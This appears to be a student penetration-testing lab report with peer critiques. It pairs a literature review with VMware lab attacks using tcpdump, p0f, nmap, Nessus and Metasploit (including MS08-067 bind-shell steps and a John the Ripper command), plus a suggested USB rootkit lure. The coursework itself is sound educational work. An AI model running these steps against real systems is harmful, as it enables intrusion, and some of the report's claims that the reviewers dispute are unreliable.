Abstract
Making use of automated exploit tools to attack a system is not a new topic. It is an idea and practice that is well founded in “hacker” and “script kiddy” culture. It is, however, a somewhat newer practice in the arena of the penetration tester. Using an automated attack tool can make the job of a security professional much easier, but it is just one part of a successful penetration analysis. That one part is nevertheless a very important part.
In this lab we will be using both passive and active analysis and recon tools. These tools, combined with automated exploit tools, will help us exploit the test target systems, which will be running in a penetration test lab on VMware. We will exploit three target systems of varying operating systems and patch levels. Making use of the exploit tools explained in the lab, we will attempt to gain access to each system in varying ways while recording and discussing our results.
Literature Review
A Taxonomy of DDoS Attack and DDoS Defense Mechanisms by Jelena Mirkovic and Peter Reiher
Distributed denial of service (DDoS) attacks are becoming a big problem, and it has become difficult for an organization to defend itself against them. In this article Mirkovic and Reiher present “two taxonomies for classifying attacks and defenses” (Mirkovic, J., & Reiher, P. 2004). They also cover how DDoS attacks are performed, giving a general overview of the process with some specifics. Attackers recruit machines that have vulnerabilities and exploit them using subversion.
Subversion in this sense means covertly taking control of a machine; it should not be confused with the open source version control tool of the same name. Attackers usually automate the process of scanning for hosts and exploiting them so that they become part of their attack network, also sometimes referred to as a bot network. After a host has been infected, that host can also attempt to recruit more hosts.
Another way of gathering hosts is by hiding a Trojan within a program that is useful to users.
There are several DDoS attack mechanisms, which in this paper have been broken up into manual, semi-automatic, and automatic. An example used for the semi-automatic and automatic categories is vertical scanning, in which “machines probe multiple ports at a single destination, looking for any way to break in” (Mirkovic, J., & Reiher, P. 2004).
The impact on the victim may be disruptive or degrading, depending on the goal of the DDoS attack. If the goal is disruptive, the attack will deny users access to the service or services being provided. Degrading attacks have the goal of consuming some “portion of a victim’s resources, seriously degrading service to legitimate customers” (Mirkovic, J., & Reiher, P. 2004).
Dynamic recovery is divided into self-recoverable, human-recoverable, and non-recoverable. Self-recoverable is exactly as it sounds: the system recovers without the aid of human interaction. Human-recoverable is when a system is in need of human intervention, such as a reboot. Non-recoverable is when the attack has done permanent damage to the target system.
DDoS defenses are differentiated between preventive and reactive mechanisms. Preventive mechanisms have the goal “to eliminate the possibility of DDoS attacks altogether or to enable potential victims to endure the attack without denying services to legitimate clients” (Mirkovic, J., & Reiher, P. 2004). Placing a decoy for attackers to attack, without actually preventing legitimate users from accessing their resources, is a great trick. Reactive mechanisms have the goal of detecting every possible DDoS attack as early as possible. This is true of defending against any attack: you want to know that you are being attacked at the earliest stage possible. Learn of it too late and the attack could already be over. A reactive mechanism must also have a low degree of false positives and provide a response mechanism.
Attack Net Penetration Testing by J.P. McDermott
McDermott talks about how penetration testing is more of an art than a science, and how testers need to have knowledge of products and systems. This article is about the usefulness of modeling penetration testing as a Petri net. This technique allows the depiction and refinement of specific attacks and attack alternatives, which is similar to attack trees. He then draws out an attack tree for opening a safe. Open Safe is at the top, four ways of opening the safe are listed below it, and from there the tree continues to grow: blackmail, eavesdrop, and so forth, in order to open the safe. Looking at every possible way to access what is desired is important for an attack tree. He also describes the six-step flaw hypothesis approach:
1. Define penetration testing goals.
2. Perform background study.
3. Generate hypothetical flaws.
4. Confirm hypothesis.
5. Generalize discovered flaws.
6. Eliminate discovered flaws. (McDermott, J.)
McDermott then goes on to give an example using the Mitnick attack, which uses SYN flooding, TCP session hijacking, and UNIX .rhosts trust relationship spoofing, to represent the exploit.
McDermott’s attack net approach to penetration testing is a good approach to follow. He may not provide any supporting data, but he does have several diagrams that show an adherence to the brainstorming activity while at the same time not restricting the free range of ideas.
Ethical Hacking and Password Cracking: A Pattern For Individualized Security Exercises by Robin Snyder
This paper is about teaching students ethical hacking by demonstrating password cracking. Cracking passwords can show which users have picked weak passwords, and this can be done during a penetration test. Passwords are often stored as hashes. There are a few different kinds of hashes; MD4, MD5, and SHA1 are popular ones. Some password crackers, such as John the Ripper, guess until the password hash is a match. The article then lays out an exercise that is given to students on how to use software such as John the Ripper to log in using different login names on a simulated web login box. The article gives two viewpoints, from the student and from the teacher. According to the feedback section the students were able to complete the assignment, found the exercise useful, and felt it was beneficial for them. These kinds of hands-on exercises are very beneficial to students; simply writing about how exploits are done is only one side of the teaching spectrum. Learning different ways to exploit usernames can show students how unsecured logins can be and how easily it is possible to exploit them.
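As a minimal sketch of the kind of wordlist-based cracking Snyder describes (the file names here are illustrative, not from the article; the hash file and wordlist would come from the exercise itself), John the Ripper can be run against a file of password hashes as follows:
john --wordlist=/usr/share/john/password.lst hashes.txt
john --show hashes.txt
The first command tries each word in the list against every hash in hashes.txt; the second prints any passwords that were successfully cracked.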
Root Kits – An Operating System Viewpoint – by Winfried E. Kühnhauser
Root kits are dangerous to operating systems; they get down into the lower layers of the operating system to execute operations with super user or system privileges. According to Kühnhauser a root kit attack is made up of four automated steps: vulnerability analysis, vulnerability exploitation, erasing all traces of the attack, and lastly installing backdoors. In step one the author says that a “randomized scan of standard IP ports is preformed by ways of harmless appearing requests” (Kuhnhauser, W. E.). This might be true, but such a scan could be picked up by an IDS monitoring the network and noticing requests across the subnet. The first step is crucial to using root kits. Another way would be to put the root kit on a USB flash drive and leave the drive where the target user would be likely to take it and, hopefully, use it on the target system. One method might even be to label the USB flash drive as BEST PORN EVER. From there two things could happen: the target victim would throw it away (not use it), or open it and tell others of the discovery. From there the rest of step one can be executed, discovering ways to exploit the host system. When attempting to remotely install a rootkit, there are several factors that were not mentioned. How would one get to the network? Is the attacker going to be on the subnet? What about firewalls, IDS, and anti-virus software? Using USB can avoid most of these variables. In his defense strategies Kühnhauser does mention firewalls and says that “firewall are useless to counter insider attacks” (Kuhnhauser, W. E.), which is essentially what the USB root kit would be doing.
Modeling TCP/IP Networks Topology for Network Vulnerability Analysis by Reza Zakeri, Hamid Reza Shahriari, Rasool Jalili, Reza Sadoddin
In this article, the authors talk about how security is a great concern and how there is no formal framework for protecting against attacks; there exist only several ad hoc techniques used to protect networks. The authors use a man in the middle attack to demonstrate how the proposed model can be used for network security analysis. The authors broke down the way the man in the middle attack works, then used derivation rules to verify that the network was vulnerable to man in the middle attacks.
Firewall Penetration Testing by Reto E. Haeni
This article talks about firewall penetration testing and how it should be executed. Haeni says that the testers should not be firewall vendors or hackers, and that an independent group that is trusted and has integrity, experience, writing skill, and technical capability should lead the testing. If this is the case, a non-hacker is in charge of attempting to break into a firewall, which is like asking a non-mechanic to fix your car. The group does need to have integrity as well as experience in how an attacker would penetrate the defenses. Haeni also mentions how often firewalls are considered the “only line of defense needed to secure our information systems” (Haeni, R. E., 1997). Treating a firewall as the only line of defense is not a good security practice; firewalls should be used in conjunction with other secure systems. Haeni also states that firewalls will have weaknesses if not installed properly. Environments are different and not all firewalls can be configured the same way. Simply saying that something was not properly installed can be applied to almost any loss after the fact.
According to Haeni, testing a firewall should be divided into four steps: indirect information collection, direct information collection, attack from the outside, and attack from the inside. Only two types of firewalls are listed: packet filtering and application level firewalls. Something to consider is, when these firewalls are filtering, what kind of performance hit is the network taking? During periods of high network usage there can be a bottleneck where the firewall box is inspecting every packet, causing congestion. Haeni’s solution is to wait until computing power has doubled, usually every 12 months according to Haeni, and buy a new firewall box; he believes this is not a great concern. Small companies may be forced to watch their spending budgets and must refrain from extravagant purchasing. Buying top of the line firewalls every 12 months can be a waste of spending, and even a company that could spend that kind of money every 12 months would still have to wait for the manufacturer to finish building the new hardware. Is getting the newest hardware always the greatest?
A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test by Shih-Jen Chen, Chung-Huang Yang, and Shao-Wei Lan
Securing systems can be a complex and challenging demand. Security fixes are costly; no one can really put a number to it, but the cost is high. The authors created a user-friendly tool that automates network vulnerability assessments. This tool is developed for Windows and is written mainly in Java. The authors claim it also generates credible reports for network mapping, vulnerability scanning, and penetration testing. They test their software and show results with screen shots. The vulnerability scan lets the user select predefined profiles or plug-ins. Microsoft Windows-related vulnerabilities, the SANS top 20 vulnerabilities, and UNIX-related vulnerabilities are just some of the predefined profiles. This somewhat answers the question of whether the tool only scans for vulnerabilities in one operating system. This software seems to closely resemble another program called NESSUS; both seem to offer the same features, such as additional plug-ins, vulnerability scanning, detailed reports, and more.
Mobile Test: A Tool Supporting Automatic Black Box Test for Software on Smart Mobile Devices by Jiang Bo, Long Xiang, and Gao Xiaopeng.
In this article, the authors talk about how smart mobile devices are becoming more powerful, and they introduce a tool called MobileTest. This tool is black box testing software for mobile devices. Phone manufacturers and third-party software vendors need to guarantee that their product is high quality; users do not like when their phone loses personal data or crashes frequently, which is much like a denial of service attack on the customer. MobileTest has a few objectives:
“Good support for interactive operations test, volume test, multiple states test, boundary test and multiple task tests.
Minimize the usage of image comparison and text recognition for state determination.
Create test cases library and provide schedule mechanism for regression test and smoke test.
Accommodate for as many devices as possible and provide adapters for future devices to be added.
Provide flexible storage support for test cases, configuration data and results.
Strong result verification abilities. Such as image comparison, OCR, audio and video data verification.
Provide mechanisms to control the environment of the target device so that it’s possible to test the device’s behavior in different environments.
Support script generation and execution visualization” (Bo, J., Xiang, L., & Xiaopeng, G. 2007)
The research on phones seems to have been done only on Nokia devices of slightly different models: the Nokia 6630, Nokia 6680, and Nokia 6681. All of the phones ran operating systems based on the Symbian platform, so the tests only show possible issues with Symbian platform phones. There are other phone platforms available, such as Windows Mobile and Apple’s iPhone OS. It seems that MobileTest is limited to only a certain brand of cell phone manufacturer.
Methods
This lab begins with the literature review listed above. The literature chosen for this week’s lab relates to the steps that will be completed as the actual lab assignment. With the completion of the literature review, the purpose of lab six is to exploit three different systems using a variety of tools and methods, and discuss the results. This task can be broken down into five main sections, as the method of exploit on each of the three systems is slightly different.

The first step involves putting together a plan of attack based on passive recon methods to exploit the first system, while recording the results. We will accomplish this by simulating network traffic of varying types between two hosts, one of which will be the target host, while a third host captures that traffic passively. We will then analyze the captured data using a tool that performs OS fingerprinting based on captured packets. Based on the analysis of the packets, exploits will be chosen and executed based on previous lab results. Records will be made as to how many exploits we needed to try before success or failure. We will be performing these steps on virtual machines running inside VMware Workstation, expecting results immediately upon completion. We are hoping to achieve an exploit within the first few tries.

The second step is much like the first, but requires the results of the first step to complete. Using the results of the first step, a plan of attack will be carried out to compromise the second chosen system. Again, the first part is to generate network traffic between two hosts, one of them being the target, while a third host captures that traffic passively. Once those captured packets have been analyzed with the OS fingerprinting tool, we will choose and execute exploits against the second target system. We will be recording our results until success or failure is met. We will be performing step two on virtual machines running on VMware Workstation, again expecting results upon completion of the tasks. For this step we hope to be able to successfully exploit the target system.

For the third step, a different target will be selected. Rather than perform passive analysis on this system, we will actively scan and analyze it. Using NESSUS and the latest version of NMAP we will obtain results that can be used to directly attack the system. Exploits will be chosen based on the version of the operating system and the open ports discovered by NMAP, as well as vulnerability data reported by NESSUS. We will then attempt to exploit the chosen system, while recording our results. Again this will be done using virtual machines running in VMware Workstation, expecting results upon completion. Our goal is to successfully exploit the system based on the reports of the tools employed.

The fourth and final step in the lab is discussion of the results. This will be based on the results themselves, how the tools used display bias towards various OSI layers, and whether or not lower OSI layer exploits allow the attacker access to the higher layers of the OSI model. This will be performed without the use of any tool other than a word processing program and our previous results. Our goal is to explain in depth our results as they pertain to real world uses.
Findings
To complete the lab, three target operating systems first had to be selected. Our lab environment consists of five virtual machines: two Windows XP virtual machines, one being the original RTM version and the second being a fully patched service pack three version; one Windows Server 2003 service pack two virtual machine; and one minimal-install Debian Etch virtual machine. The fifth virtual machine is a pre-built Backtrack version three virtual machine. While this is one of the lab’s five virtual machines, it will not be a target host, as it is our primary platform for penetration testing operations. The three chosen machines were the Windows XP RTM VM, the Windows XP SP3 VM, and the Windows Server 2003 VM. We also attempted to exploit the Debian machine, but due to the lack of any running daemons this proved to be futile. For step one, we used the Windows XP RTM VM as the target. We chose to use tcpdump and p0f as the passive analysis tools, as they work together and are part of the Backtrack tool suite. We ran the following command from the Backtrack CLI:
tcpdump -i eth0 -w tcpdump1
This tells tcpdump to capture packets on the eth0 interface and save them to the output file tcpdump1 instead of displaying them on the screen. The eth0 interface on the Backtrack VM was connected to the same vSwitch as the target host. We then logged into the target VM and started to create network traffic. We chose to ping, telnet, and connect to an SMB share on the host that would be the step two target. We stopped tcpdump on the Backtrack VM with ctrl+c, loaded the chosen fingerprinting tool, p0f, and told it to analyze the packet capture ‘tcpdump1.’ The results are detailed in figure one in the tables and figures section. According to p0f the collected packets were from a Windows 2000 SP4 machine and/or a Windows XP SP1+ machine. With this information in hand we loaded the Metasploit Framework version 3 GUI from the Backtrack menu on the Backtrack VM and chose an SMB exploit, detailed in figure two below. We knew that because it was a Windows XP host, the services related to server message block were available, as Windows relies on ports 137, 139, and 445 being open for proper network operation. We pointed the chosen exploit at the IP address (192.168.2.3) of the target host and ran it. Success was achieved on the first attempt and is detailed in figure three.
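For reference, a minimal sketch of the p0f step as run from the Backtrack CLI (assuming the p0f version 2 that ships with Backtrack, where the -s flag reads packets from a saved tcpdump capture):
p0f -s tcpdump1
p0f then prints an operating system guess for each host seen in the capture, which is where the Windows 2000 SP4 / Windows XP SP1+ result above came from.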
For step two, the same process was completed as above. We ran the following command from the backtrack cli:
tcpdump -i eth0 -w tcpdump2
Again, eth0 on the Backtrack VM was connected to the same vSwitch as the target host, and tcpdump2 was the name of the output file used to store the captured packets instead of displaying them on screen. In this case, the target host operating system was the Windows XP service pack three VM. We then logged on to the part one target machine and pinged, attempted telnet, and attempted SMB share access on the current target VM. This generated enough packet data for p0f to state, as before, that the target machine was indeed a Windows XP SP1+ machine, which is detailed in figure four. With this information in hand an exploit was chosen based on our previous lab work and the Metasploit Framework. We again settled on an SMB vulnerability, as these are most prevalent and, even with the Windows firewall running, the SMB ports must be accessible to other hosts to allow proper Windows network operation. We attempted the same exploit we used in figure two below, and it proved unsuccessful. We then attempted to exploit MS08-067, a very recent critical SMB vulnerability affecting all versions of Windows. We again met with failure. The MS04-011 LSASS vulnerability was attempted next, also proving useless. We also considered MS09-001. As we searched through the list of available Metasploit vulnerabilities, most of the possible tool based attack vectors were either very old and outdated, or targeted third party applications, none of which were running on our target host. After examining the list of available exploits in Metasploit as well as the other programs on the Backtrack VM, it was obvious that a fully patched Windows XP service pack three machine was not exploitable without running any third party programs. After spending a number of hours trying to exploit the Windows XP SP3 machine, researching available vulnerabilities on the Microsoft website and comparing them to available exploits in Metasploit, we decided to move on. The currently available vulnerabilities did not match up to any available exploits in Backtrack. Before accepting failure we had tried 20 different exploits.
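As an illustration of what one of these attempts looks like from the Metasploit 3 console (the module and payload names below are the standard ones for MS08-067; the options we actually set in the GUI may have differed, and the target address is shown as a placeholder):
use windows/smb/ms08_067_netapi
set RHOST <target ip>
set PAYLOAD windows/shell/bind_tcp
exploit
Against the patched SP3 host a run like this simply completes without creating a session, matching the failures described above.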
For the third system we first attempted to exploit the Debian machine. It had no running daemons according to the NESSUS and NMAP scans, i.e., no open ports for a possible network exploit. Rather than just move on to the Windows Server 2003 machine, we used apt-get to install OpenSSH, OpenSSL, Samba, and Apache. We then attempted to exploit these using Metasploit; however, the versions of these programs installed were patched against the exploits in Metasploit.
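A sketch of that install step, run as root on the Debian Etch VM (the exact package names are our assumption; on Etch the SSH server package is openssh-server and Apache is packaged as apache2):
apt-get update
apt-get install openssh-server openssl samba apache2
This gives the otherwise minimal install a handful of listening services (SSH, SMB, HTTP) for the scanners and Metasploit to work against.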
After the Debian machine we moved on to the Windows Server 2003 machine. We ran NMAP and NESSUS scans against it, as detailed in figures five and six. We downloaded the latest NESSUS plug-ins and the latest version of NMAP, NMAP 5. NMAP 5 was released last week and offers a few major improvements over the last version, which are detailed on the NMAP website. Figure seven details the few vulnerabilities that NESSUS found, but they do line up with the open ports that NMAP found. We attempted to take advantage of the SMB based vulnerabilities found using NESSUS, namely the vulnerabilities on port 445. However, using Metasploit we found these vulnerabilities to be useless, as the machine had been patched against them. Again, after spending a number of hours researching vulnerabilities against a patched version of Windows Server 2003 and comparing them to Metasploit, which is the core pen testing application in Backtrack, we determined it was not possible. Like Windows XP SP3, without running vulnerable third party programs, it would be next to impossible to exploit a Windows Server 2003 machine using automated exploit tools. After attempting the same exploits we attempted on the Windows XP SP3 machine, including MS04-011, MS08-067, and MS09-001, and about 15 others, we gave up. Our determination is that with a good patch policy, automated exploit tools are not very effective if they do not keep up with current vulnerabilities.
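A sketch of the kind of NMAP 5 scan used here (the target address is a placeholder; the exact options we ran are shown in figure five): a SYN scan with service version detection and OS detection across all TCP ports.
nmap -sS -sV -O -p- <target ip>
The open ports and version strings this reports are what we compared against the NESSUS findings when choosing exploits.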
Using the results of this lab as well as previous labs, bias in tool selection and use comes into play. The first bias seems to exist in the OSI layers. Most vulnerabilities exploit problems that exist in the higher layers of the OSI model, layers 5 through 7 to be specific. The lower layers generally do not seem to be exploited as much, as is apparent in the automated tools that perform vulnerability exploitation. This does not mean that lower layer software, like network drivers for example, is not vulnerable; it only means that exploit developers do not focus on the lower layers. From our standpoint this seems like an error in reasoning, as exploiting a lower layer, like layer two, would give the exploiter access to the higher layers. By intercepting and changing the information given to the higher layers of the OSI model, an attacker could craft and deliver any information they chose to an application running on the target system. Another bias becomes apparent in vulnerability analysis. By making use of NESSUS we saw that it was much more likely to show possible vulnerability information for Windows machines than *NIX style machines. This is also shown in Metasploit, which has a larger number of exploits in its database for Windows machines than *NIX machines. The final bias, which seems to be related to those listed above, is that NESSUS isn’t always accurate in the information it gathers. The information in its database of plug-ins suggests that it would be the tool to use to discover how to exploit a system. This is not always the case. Based on our lab results, we were able to exploit a system faster without NESSUS than with it. The Windows XP RTM machine was exploited on the first attempt using nothing more than passive tools and some know-how, while we were not able to exploit the Windows Server 2003 machine using the results of the NESSUS and NMAP scans. The bias of NESSUS itself seems to be that it doesn’t actually check to see whether the vulnerabilities it lists are actually exploitable.
Issues
There were three major issues with this lab. First, we were not able to exploit the Windows XP SP3 machine using passive tools. Second, we were not able to exploit the Windows Server 2003 machine or the Debian machine using active scanning tools. Third, Metasploit’s website was down most of the weekend, preventing us from downloading the most recent updates to Metasploit until Sunday.
Conclusions
Using tools to exploit possible target systems is a very simple task. There are a number of automated tools available in the wild that aid would-be attackers in gaining unauthorized access to victim computer systems. However, this lab has shown that tools alone are not always the answer. Without the know-how of an actual security professional, exploit tools are nothing more than a guess-and-check, finger-crossing exercise. But in the hands of the right person with the right knowledge, automated attack tools are a very dangerous weapon in the penetration tester’s arsenal.
Tables and Figures
Figure 1
Figure 2
Figure 3
Figure 4
Figure 5
Figure 6
Works Cited
Bo, J., Xiang, L., & Xiaopeng, G. (2007). MobileTest: A Tool Supporting Automatic Black Box Test for Software on Smart Mobile Devices. Second International Workshop on Automation of Software Test, 1-8.
Chen, S.-J., Yang, C.-H., & Lan, S.-W. (2007). A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test. The 2007 Symposium on Cryptography and Information Security (pp. 1-4). Sasebo: The Institute of Electronics Information and Communication Engineers.
Haeni, R. E. (1997). Firewall Penetration Testing. Washington, DC: The George Washington University.
Kuhnhauser, W. E. (2004). Root Kits – An Operating Systems Viewpoint. ACM SIGOPS Operating Systems Review, 12-23.
McDermott, J. (2001). Attack Net Penetration Testing. Proceedings of the 2000 workshop on New security paradigms (pp. 15-21). Ballycotton: ACM.
Mirkovic, J., & Reiher, P. (2004). A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. ACM SIGCOMM Computer Communications Review, 39-54.
Snyder, R. (2006). Ethical Hacking And Password Cracking: A Pattern For Individualized Security Exercises. InfoSecCD Conference ’06 (pp. 13-18). Kennesaw: ACM.
Zakeri, R., Shahriari, H., Jalili, R., & Sadoddin, R. (2005). Modeling TCP/IP Networks Topology for Network Vulnerability Analysis. In V. Kumar, J. Srivastava, & A. Lazarevic, Managing Cyber Threats (pp. 247-266). Springer US.
This group’s abstract was well written. The abstract starts off explaining the concept of using automated tools to attack a system and how automated tools make penetration testing much easier. They also explain that only through proper planning can a really successful penetration be accomplished. The last part of the abstract explains what will be involved in this lab.

This lab’s literature review could have been done better. The review of each of the articles was a summary of the article and not much else. Some of the reviews did give a comment or two about the information in the article, but did not actually review the article. The reviews lacked any information on how each of the articles relates to the others or how they relate to the current lab. The reviews also lacked a discussion of the methodology or research of the articles. The group did do a commentary-style discussion of some of the articles, but did not put much into giving their opinion. Some of the reviews were extremely short and just gave a quick summary of the whole article. This group could have done a much better job on the literature review section of this lab.

The methodology the group put together for this lab seemed to be just a rehash of the steps for this lab given in the lab rules. The group explained each step of the lab, but did not give any details on how they were going to accomplish that part of the lab. One of the requirements of the lab was to choose three systems to perform penetration tests on, and the group did not even give the operating systems that they were going to perform their penetration tests on. The group also did not give any tools that they were going to use or how they were going to configure or use those tools. The group did do a good job in keeping any results out of the methodology, but did not describe the lab setup as part of that process. Examining this shows me that a lot of material that should have been in the methodology is going to be in the findings part of this lab.

In the beginning of the findings section the group starts off giving the setup of their penetration test lab. As mentioned earlier, this should have been part of the methodology section of this paper. The group is using a Backtrack system as the attack platform and the three Windows platforms as the targets. The group also tried to penetrate a Debian system, but because there were no services running on that system they gave up the attempt. The group then goes on to explain the tools and how they set up the commands to use each of the tools. Again, this should have been in the methodology section. The group then does a nice job in explaining all the steps of how they ran the penetration test on the first operating system, Windows XP RTM, and how they were successful in gathering information and using that information to run an exploit on the system to gain access to it. The group then goes into explaining the second system that they tried to exploit, which was the Windows XP SP3 system. Using the same attack plan as the previous penetration test, the group gained information on the type of operating system used on that system. They then tried a number of exploits against the system and failed to penetrate it. They give a very good explanation of the types of exploits they used, and they also give a brief explanation of what might work, but do not try it out. They briefly explain the penetration test they did on the Debian system. They even loaded some services onto the operating system and tried to exploit it, but failed.
Next the group explains the penetration test against the Windows Server 2003 machine. In this one the group uses the newest plug-ins and versions of Nessus and Nmap to actively scan the operating system. This gave them a list of vulnerabilities to use against the machine, but when attempts were made at exploiting the vulnerabilities the penetration test failed. The group again explained this step very well and gives details on the exploits they used and how many attempts they tried. The last part of the findings section gives a discussion of what was discovered while doing all these labs. The section explains nicely how, by attacking lower layers, one could control higher layer devices and applications. They also explain the bias toward Windows operating systems, in that exploits for Windows are more prominent than exploits for UNIX or Linux systems. Last, the group explains that using Nessus and Nmap will not always work better than a manual scan of a system and then picking exploits to test the vulnerabilities. The group points out that even though Nessus or Nmap show the vulnerabilities, they do not test whether exploits will work against them. The issues that the group had were that they could not exploit the Windows XP SP3 system, Windows Server 2003 system, and the Debian system. I do not think that this was necessarily an issue, but rather that it showed that some systems are a lot harder to penetrate. The other issue that the group had was that the Metasploit website was down and the group could not get the newest updates until Sunday. The group’s conclusion does a great job of summing up what they learned in this lab. They explain that automated tools do not work that well unless they are in the hands of a professional. At the end of the paper the group gives screenshots of each of the attempts at either gaining information from the operating systems or exploiting the vulnerabilities to gain access.
While I don’t make a point of criticizing abstracts too often, I disagree with the statement in the abstract that automated tools are a new practice in the area of penetration testing. I think the previous labs have shown us that they’re used all too much and can actually create vulnerabilities instead of finding them. The literature review is another example of the kind of literature review we’ve been told lab after lab this semester not to do. Each article is handled individually with no ties to the lab exercises. In addition to this, the titles of the papers aren’t formatted any differently from the rest of the text, which makes it hard to distinguish between them. In the first paper, subversion is mentioned as an “open source tools that has several features not just for exploiting machines.” I only find two mentions of the word “subversion” in the paper by Mirkovic, and neither of them mentions a tool for exploiting machines. The citations in the review don’t have any page numbers with them, so it is difficult for the reader to cross-reference back to the source material. The summary of Kühnhauser’s paper was extremely poor. The citation of the paper was completely wrong, and there are subject/verb disagreements and grammatical errors.
The methodology section details the major points and objectives that the team will accomplish in the lab but lacks detail. The detailed commands and processes for the lab are found more in the findings section. The team mentions that they captured traffic from the virtual machines but didn’t mention how it was captured in the virtual switch environment. Is the broadcast traffic enough to identify the hosts? The details of the actual exploit are too brief. What exploit was used? What tool was used? What did they do with the target machine once it had been compromised? The account of the attack against the service pack three virtual machine was more detailed and showed some good ideas for assessing the target host. Since mention was made that twenty different exploits were tried before the team gave up, it would have been interesting to find out what exactly those were. The third system also proved difficult for the team; I liked the fact that they attempted to install additional software on the minimal Debian install to make it more of a functional server and increase the attack surface a bit. Again, the group mentions trying 15 different tools, though no other detail is given besides this number.
The findings regarding the bias of the tools have some issues. The statement regarding Nessus showing more vulnerabilities for Windows machines than *nix machines doesn’t have any backing behind it. I believe there are actually more vulnerabilities for *nix operating systems and applications in Nessus than there are for Windows. The same criticism is given to Metasploit, though a quick glance shows quite a few vulnerability exploits for *nix operating systems and applications.
At first the team states that using automated exploit tools is not a new topic, but then two sentences later the team states that it is a newer topic for penetration testers. The English in the abstract, as well as in the rest of the lab report, is poor. “In this lab we will be using both passive and active analysis and recon tools” is just one example of the poor English. I do not think that the abstract is very clear on what the lab is going to be about. The wording makes it very difficult to follow and understand what the team is trying to convey to the audience. The literature review is a LIST. Teams should know by now not to make the literature review a list, from comments on previous lab reports from this team as well as from other teams. Where are the page numbers for the citations? The audience will not be able to pinpoint where the quotes come from without the page numbers, unless they read the sources as well. The audience should be able to go to the page number of the reference and see the quote in context.
The team did not answer many of the questions that are required in the literature review. Some of the reviews of the articles were summaries of them without any citations. BEST PORN EVER. Is there really much more I can say about how much that stuck out in the lab report? Some of the articles did not get as much attention as the rest. Was this because there was not as much information in the article, or because the team did not feel that it deserved the same scrutiny as the others? The “Mobile Test” article review was formatted oddly; the paragraph was broken up. Before submission the team should preview their post to ensure that all the formatting is correct and that nothing like this happens in a lab report. How does the literature for this lab relate to the lab assignment? The team does not mention this in the literature review at all. The methods section is just one big paragraph. Separation can make it easier to read. It was nice that the team started to separate the steps in the findings, but there were more steps in the methods section than were listed in the findings section. I am not sure that the inability to exploit the machines is really an issue. Failure is always an option. Remember that. If the lab had been started before the weekend, Metasploit’s website might not have been down. Never expect that all sites will be up, especially at Purdue over the weekend. The first sentence of the conclusion states that using tools to exploit systems is a simple task, and yet this team was not able to exploit their own systems.
Team 2’s abstract does not provide clear direction as to what the lab is going to be about. The grammar makes it very difficult to follow and understand what they are trying to say. They do a good job of explaining the use of automated tools for hacking but go on to say that using automated tools in penetration testing is fairly new. This is not what I found to be true in the previous weeks’ articles.
The literature review is a summary and list of each of the articles and does not tie back to the lab exercises. Some of the reviews of the articles were summaries and did not have proper citations.
The titles of the papers were not properly formatted which made it difficult to distinguish between them. As with team 2’s last literature review there were citation errors and grammatical errors. The team did not answer many of the questions that are required in the literature review.
The methods section is just one big paragraph. This made it difficult to follow. They did however separate the steps in the findings, but there were more steps in the methods section than were listed in the findings section.
Team 2’s conclusion does a good job of summing up what they learned in this lab. They explain that automated tools do not work that well unless they are in the hands of a professional. The screenshots of each of the attempts at the end of the paper of the information from the operating systems or exploiting the vulnerabilities to gain access was helpful to see.
Team 2 begins with the abstract and briefly discusses hackers, script kiddies, and the newer area of the penetration tester. This was a good observation for a newly growing area of security. They then go into a brief description of what is going to occur during the lab. Next the team goes into their literature review and gives a brief overview of what the literature was about. They do a good job of relating and creating arguments for each of the pieces of literature, but it is still not a cohesive literature review, in that it discusses the topics more than how the articles relate to one another. The group then goes into the methodology section and describes what they are going to do within the hands-on section of the lab. They described some of the tools they were going to use, but which operating systems they were going to target did not appear in this section. In the next section they went on to the results. The team does a good job of describing in detail the findings for the different exploits. It also becomes apparent in this section which systems they are trying to exploit. The operating systems they chose were Windows Server 2003, Windows XP SP1, and Debian Linux. They broke the section down into parts describing the exploits against each system. Where the section might have yielded better results is in creating a plan before attacking each system passively or aggressively; if this had been done the attacks may have been more successful. The lack of success against Debian Linux was plausible, though, given its small attack surface. The team then discussed the issue of not being able to get the most recent update of Metasploit until Sunday to run more testing against the systems. The team then concludes with a simple conclusion about using tools to exploit systems. I would have to agree with the point that if a user does not know how to use a tool properly it pretty much becomes a paperweight, but if they know how to use the tool it could cause problems in the wrong user’s hands. A question did come to mind: if the students were given more time, would it be more likely that each team would have greater overall success when attacking the systems? What other factors might have changed the results of the lab? Also, are the teams still getting over the barrier of thinking only about protecting a system rather than attacking one? I feel that even though there is an understanding of how tools and exploits are supposed to work, there is still a hump that we might never get over unless we become hackers ourselves. Overall the team did a good job with the lab. There were a few areas that may have needed more explanation, but the lab still met the requirements of what was asked.
In the abstract section, team 2 discusses the use of automated tools in conducting penetration tests, and states that the use of tools is just one part of a successful penetration test. They state their purpose for the lab is to use active and passive reconnaissance tools, along with automated exploit tools to gain access to three different target systems.
They begin their literature review by discussing A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. They proceed to describe several of the terms included within the document; however, they never really explain what a distributed denial of service attack is. They also discussed Root Kits – An Operating System Viewpoint. They provided a short description of a root kit, only stating that it can execute operations at the super user or system level. They discuss several options for distributing a root kit, such as attempting to install it over a network or tricking someone into using an infected thumb drive. Perhaps the best way to distribute a root kit is as a Trojan inside an otherwise innocent looking program. In their review of Firewall Penetration Testing, team 2 makes a good point by saying “Firewalls should be used in conjunction with other secure systems.” Team 2 discusses firewall packet filtering and the performance concerns due to the overhead involved in inspecting each packet. The author of this article himself states “I personally think that this is not too great concern as computing power is doubled roughly every 12 months and therefore solves the problem in time”. Since this article was written in 1997, by this estimate computing power would have doubled 11 times by now. That would be 2048 times the computing power available back then (2^11). Perhaps the overhead of packet filtering is not as much of a concern now as it was then. They also discuss A Distributed Network Security Assessment Tool with Vulnerability Scan. They compare this vulnerability assessment tool to Nessus. Although there are some similarities between the tools, this article describes a controller-agent system in which the agents are placed throughout the network to perform testing and send reports back to the controller. This team spelled security in the title of this document as “Secuiryt”. Although a typographical error, it should have been discovered by running a simple spell check. Apparently team 2 did not do this before submitting the lab assignment. That may account for some of the other spelling errors scattered throughout the document.
They begin their methodology section by stating that “the literature chosen for this week’s lab relates to the steps that will be completed as the actual lab assignment”. This seems to be the only place that team 2 attempts to make any correlation between the literature review and lab assignment.
